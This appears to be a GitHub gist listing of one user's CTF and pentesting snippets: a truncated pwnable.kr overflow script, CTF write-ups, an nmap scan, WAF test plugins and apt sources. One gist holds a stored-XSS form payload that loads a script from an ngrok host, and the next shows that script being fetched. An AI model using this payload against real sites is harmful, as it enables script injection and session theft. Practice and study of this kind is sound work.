Rewanth Tammana rewanthtammana
🎯
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Download : http://pwnable.kr/bin/bof | |
| # Download : http://pwnable.kr/bin/bof.c | |
| from pwn import * | |
| import struct | |
| import time | |
| import re | |
| for i in range(0,100): | |
| s = remote('pwnable.kr', 9000) |
rewanthtammana
/ gist:32aa55316f6a52fb57fb881a55bcceb3
Last active
October 22, 2017 16:02
blackbox_pentesting
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http://1128152f.ngrok.io/ew.js -> redirection script | |
| ------------------------------------------------ | |
| <!--Actual file to be run--> | |
| <form id='f' action="http://bloodsuckers.world/admin/contact" method='POST'> | |
| <input type="text" name="name" value="';x='"> | |
| <input type="text" name="name" value="';var script = document.createElement('script'); script.src = 'http://1128152f.ngrok.io/ew.js';document.body.appendChild(script);//"> | |
| <input type="text" name="message" value="hohoho"> | |
| </form> |
rewanthtammana
/ gist:104dee4e8d12a81da50a302f33fec5c7
Created
October 22, 2017 16:10
ngrok output - blackbox_pentesting
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Serving HTTP on 0.0.0.0 port 8000 ... | |
| 127.0.0.1 - - [22/Oct/2017 21:29:11] "GET / HTTP/1.1" 200 - | |
| 127.0.0.1 - - [22/Oct/2017 21:29:11] code 404, message File not found | |
| 127.0.0.1 - - [22/Oct/2017 21:29:11] "GET /favicon.ico HTTP/1.1" 404 - | |
| 127.0.0.1 - - [22/Oct/2017 21:29:40] "GET /ew.js HTTP/1.1" 200 - | |
| 127.0.0.1 - - [22/Oct/2017 21:30:11] "GET /ew.js HTTP/1.1" 200 - | |
| 127.0.0.1 - - [22/Oct/2017 21:30:12] code 404, message File not found | |
| 127.0.0.1 - - [22/Oct/2017 21:30:12] "GET /favicon.ico HTTP/1.1" 404 - | |
| 127.0.0.1 - - [22/Oct/2017 21:33:38] "GET /ew.js HTTP/1.1" 200 - |
rewanthtammana
/ nullconCTF - misc 2
Created
February 11, 2018 16:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Hints given - I don't like HTTP but I like table tennis. | |
| Table tennis is also called as ping pong. This means the data is transmitted in ping packets. So, our data is in ICMP packets. | |
| Add a filter in wireshark, ip.proto=="icmp" and you will get all the icmp packets. | |
| You can also see that there is a data value in the ICMP packets. There are so many data packets and I used tshark to automate extration stuff but the results were not of any use. | |
| Then I observed the size of data in each packet varies, they are of different sizes like 48 bytes and 2 bytes. | |
| You can clearly see that the 48 byte packets are trash data. So, I manually written all the 2 bytes values on the paper and then decoded that value which gave me the flag. | |
| Flag - hackim18{'51mpL3st_Ch4ll3ng3_s0lv3d'} |
rewanthtammana
/ nullconCTF - web 2
Last active
February 11, 2018 16:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| THere is a hidden .git folder | |
| You can use Git-tools (https://github.com/internetwache/GitTools) to download the .git folder and extract the files. | |
| First dump the files using Dumper and then extract the files of each commit using Extractor. Both these tools are available in the above link. | |
| Once you download the files and analyze them you can see an index.php file deleted and you can see its code as we extracted is using Extractor in the above step. | |
| URI: 3e90c63922fa145442bb58d18b62af6c21717fee/index.php | |
| In the index.php the login validation function is as follows, |
rewanthtammana
/ gist:78b9078bc7f66069d5769ef98ae2bc56
Created
October 22, 2017 10:11
blackbox_pentesting
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| PORT STATE SERVICE REASON VERSION | |
| 21/tcp open ftp syn-ack ttl 128 FileZilla ftpd | |
| | ftp-syst: | |
| |_ SYST: UNIX emulated by FileZilla | |
| | ssl-date: | |
| |_ ERROR: Unable to obtain data from the target | |
| 53/tcp open domain syn-ack ttl 128 Microsoft DNS | |
| 80/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) | |
| |_http-server-header: Microsoft-HTTPAPI/2.0 | |
| |_http-title: Not Found |
rewanthtammana
/ 888-block-all.js
Last active
September 16, 2019 09:08
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const plugin_version = '2018-1000-1000' | |
| const plugin_name = '888-block-all' | |
| // This plugin is used to test the interception effect | |
| // | |
| // The logic of this plugin is that it will be intercepted regardless of whether the request is normal or not. | |
| // To open this plugin, first remove the following throw :-) | |
| // Throw new Error ("This plugin will block all operations, in order to prevent misuse, please delete this line") | |
| 'use strict' |
rewanthtammana
/ 888-china-block-all.js
Last active
September 16, 2019 11:40
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const plugin_version = '2018-1000-1000' | |
| const plugin_name = '888-block-all' | |
| // 本插件用于测试拦截效果 | |
| // | |
| // 这个插件的逻辑是,不管请求是否正常,一律拦截 | |
| // 若要开启这个插件,请先删除下面的 throw :-) | |
| // throw new Error("本插件会拦截所有操作,为了防止误操作,请请删掉这一行") | |
| 'use strict' |
rewanthtammana
/ gist:ecf8e1ddc52c6896f4b16d5710f74230
Created
May 7, 2020 12:59
Protostar machine upgrade
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # lsb_release -a | |
| # /etc/apt/sources.list for squeeze | |
| deb http://archive.debian.org/debian squeeze main | |
| deb http://archive.debian.org/debian squeeze-lts main |
rewanthtammana
/ gist:6ee04805e82ba02521a2c21a21cbeab5
Last active
May 7, 2020 12:59
Protostar machine upgrade
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # lsb_release -a | |
| # /etc/apt/sources.list for squeeze | |
| deb http://archive.debian.org/debian squeeze main | |
| deb http://archive.debian.org/debian squeeze-lts main | |
| # also edit /etc/resolv.conf with google's DNS and comment the provided DNS. |
OlderNewer